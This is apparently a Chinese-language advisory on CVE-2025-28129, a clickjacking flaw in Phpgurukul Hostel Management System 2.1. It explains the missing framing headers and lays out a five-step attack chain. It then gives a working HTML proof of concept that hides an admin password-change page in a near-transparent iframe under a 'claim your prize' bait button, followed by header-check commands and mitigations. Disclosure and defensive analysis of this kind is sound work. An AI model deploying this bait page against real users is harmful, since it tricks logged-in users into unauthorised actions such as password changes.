CVE-2025-28129 Phpgurukul宿舍管理系统2.1点击劫持漏洞

漏洞信息

漏洞编号

CVE-2025-28129

漏洞类型

点击劫持（Clickjacking / UI Redress）

CVSS评分

5.4 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

Phpgurukul Hostel Management System

漏洞概述

CVE-2025-28129是Phpgurukul宿舍管理系统（Hostel Management System）2.1版本中存在的一个点击劫持（Clickjacking）安全漏洞。点击劫持是一种基于界面的攻击方式，攻击者通过将目标网站嵌入到恶意构造的iframe框架中，并利用透明层覆盖等技术手段，诱骗用户在不知情的情况下点击看似无害的页面元素，实际上却触发了对目标网站的操作。该漏洞的CVSS 3.1评分为5.4，属于中等严重级别。攻击者无需进行身份认证即可发起攻击，但需要用户进行交互操作（如点击）。漏洞对系统的机密性和完整性产生低级别影响，但不会直接影响系统的可用性。该漏洞于2025年10月6日被公开披露，其根本原因在于应用程序未在HTTP响应头中设置适当的X-Frame-Options或Content-Security-Policy（CSP）的frame-ancestors指令，导致网站内容可以被任意第三方网站通过iframe方式嵌入和加载。Phpgurukul宿舍管理系统是一款基于PHP开发的开源Web应用程序，广泛用于学校、学院和其他住宿管理机构管理宿舍分配、费用缴纳、学生信息等功能。由于该系统涉及用户敏感信息和财务数据，点击劫持漏洞可能导致未经授权的操作，如修改个人信息、费用支付等，给用户和组织带来潜在的安全风险。

技术细节

点击劫持（Clickjacking）是一种利用视觉欺骗手段的攻击技术，其核心原理是利用HTML的iframe标签将目标网站嵌入到攻击者控制的网页中，并通过CSS样式将iframe设置为透明或半透明状态，覆盖在精心设计的诱饵内容之上。当用户访问攻击者构造的恶意网页时，看到的是诱饵内容，但实际点击的却是底层目标网站的按钮或链接。

在CVE-2025-28129案例中，Phpgurukul宿舍管理系统2.1版本的Web服务器在返回HTTP响应时，未包含以下关键安全头：
1. X-Frame-Options: 该HTTP响应头用于控制页面是否可以被嵌入到iframe中，可设置为DENY（完全禁止嵌入）、SAMEORIGIN（仅允许同源嵌入）或ALLOW-FROM uri（允许特定来源嵌入）。
2. Content-Security-Policy: frame-ancestors指令：这是现代浏览器推荐使用的替代X-Frame-Options的机制，提供更灵活的frame嵌入控制。

由于缺少这些安全头，攻击者可以创建一个恶意网页，在其中使用iframe加载Phpgurukul宿舍管理系统的特定功能页面（如费用支付、信息修改等），并通过CSS将iframe设置为透明，同时在页面上放置吸引用户点击的诱饵元素。当已登录的用户访问该恶意页面时，其点击操作实际上会作用于底层的宿舍管理系统，可能导致未经授权的数据修改或财务操作。

该漏洞的利用需要用户交互（UI:R），且无需认证（PR:N），攻击可通过网络远程发起（AV:N），攻击复杂度低（AC:L），主要影响数据的机密性（C:L）和完整性（I:L），不影响可用性（A:N）。

攻击链分析

STEP 1

步骤1：信息收集与目标确认

攻击者首先识别目标网站使用的是Phpgurukul Hostel Management System 2.1版本，通过检查HTTP响应头确认目标站点未设置X-Frame-Options或Content-Security-Policy的frame-ancestors指令。

STEP 2

步骤2：恶意页面构造

攻击者创建一个包含诱饵内容的恶意HTML页面，使用iframe标签将目标宿舍管理系统的敏感功能页面（如密码修改、费用支付、信息更新等）嵌入其中，并通过CSS将iframe设置为透明状态覆盖在诱饵按钮之上。

STEP 3

步骤3：社工诱导

攻击者通过钓鱼邮件、社交媒体或其他渠道将恶意页面链接发送给目标用户，利用社会工程学手段诱骗用户访问该页面。

STEP 4

步骤4：用户交互触发

已登录宿舍管理系统的用户在访问恶意页面后，看到诱人的'领取奖品'或'中奖'等按钮，点击时实际触发了对底层宿舍管理系统的操作，如修改密码、支付费用或更改个人信息。

STEP 5

步骤5：未授权操作执行

由于用户的点击操作通过透明的iframe传递给了宿舍管理系统，攻击者成功利用用户的身份执行了未授权的操作，可能导致账户被接管、财务损失或数据泄露。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-28129 - Phpgurukul Hostel Management System 2.1 Clickjacking PoC
# This PoC demonstrates how to exploit the missing X-Frame-Options header
# to embed the vulnerable application in a malicious iframe for clickjacking attacks.

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>Special Offer - Click to Claim!</title>
    <style>
        /* Style for the malicious page */
        body {
            font-family: Arial, sans-serif;
            text-align: center;
            margin-top: 50px;
            background-color: #f0f0f0;
        }
        .bait {
            position: relative;
            z-index: 1;
            padding: 20px;
            background-color: #ff9900;
            color: white;
            font-size: 24px;
            font-weight: bold;
            border-radius: 10px;
            cursor: pointer;
            width: 300px;
            margin: 0 auto;
        }
        /* Transparent iframe overlaying the bait button */
        iframe {
            position: absolute;
            top: 0;
            left: 0;
            width: 100%;
            height: 100%;
            opacity: 0.0001;  /* Nearly transparent */
            z-index: 2;
            border: none;
        }
        /* Position the iframe to align with the bait button */
        .iframe-container {
            position: relative;
            width: 340px;
            height: 80px;
            margin: 20px auto;
        }
    </style>
</head>
<body>
    <h1>Congratulations! You Won a Prize!</h1>
    <p>Click the button below to claim your reward:</p>

    <div class="iframe-container">
        <!-- Bait element that the user thinks they are clicking -->
        <div class="bait">CLAIM YOUR PRIZE NOW!</div>

        <!-- Vulnerable target embedded in transparent iframe -->
        <!-- Replace with the actual URL of the target action page -->
        <iframe src="http://target-hostel-system.com/admin/change-password.php"></iframe>
    </div>

    <p>This is a demonstration of CVE-2025-28129 clickjacking vulnerability.</p>
</body>
</html>

# Verification Steps:
# 1. Deploy the vulnerable Phpgurukul Hostel Management System 2.1
# 2. Host this HTML file on an attacker-controlled web server
# 3. Send the URL to a victim who is logged into the hostel management system
# 4. When the victim clicks the "CLAIM YOUR PRIZE NOW!" button,
#    they are actually clicking through to the embedded hostel system page
# 5. Check the HTTP response headers of the hostel system:
#    curl -I http://target-hostel-system.com/
#    If X-Frame-Options or CSP frame-ancestors is missing, the site is vulnerable

# Curl command to verify the vulnerability:
# curl -I http://target-hostel-system.com/index.php
# Look for absence of these headers:
#   X-Frame-Options: DENY
#   X-Frame-Options: SAMEORIGIN
#   Content-Security-Policy: frame-ancestors 'none'
#   Content-Security-Policy: frame-ancestors 'self'

影响范围

Phpgurukul Hostel Management System 2.1

防御指南

临时缓解措施

在等待官方补丁发布期间，可以通过以下临时措施缓解风险：1）在Web服务器（如Apache、Nginx）层面手动配置X-Frame-Options头为DENY或SAMEORIGIN；2）在PHP应用的公共入口文件或.htaccess中添加Content-Security-Policy头，设置frame-ancestors 'none'；3）对关键管理操作页面实施额外的身份验证步骤；4）建议用户在使用系统时保持警惕，避免点击来历不明的链接；5）监控异常的账户操作行为，及时发现潜在的点击劫持攻击。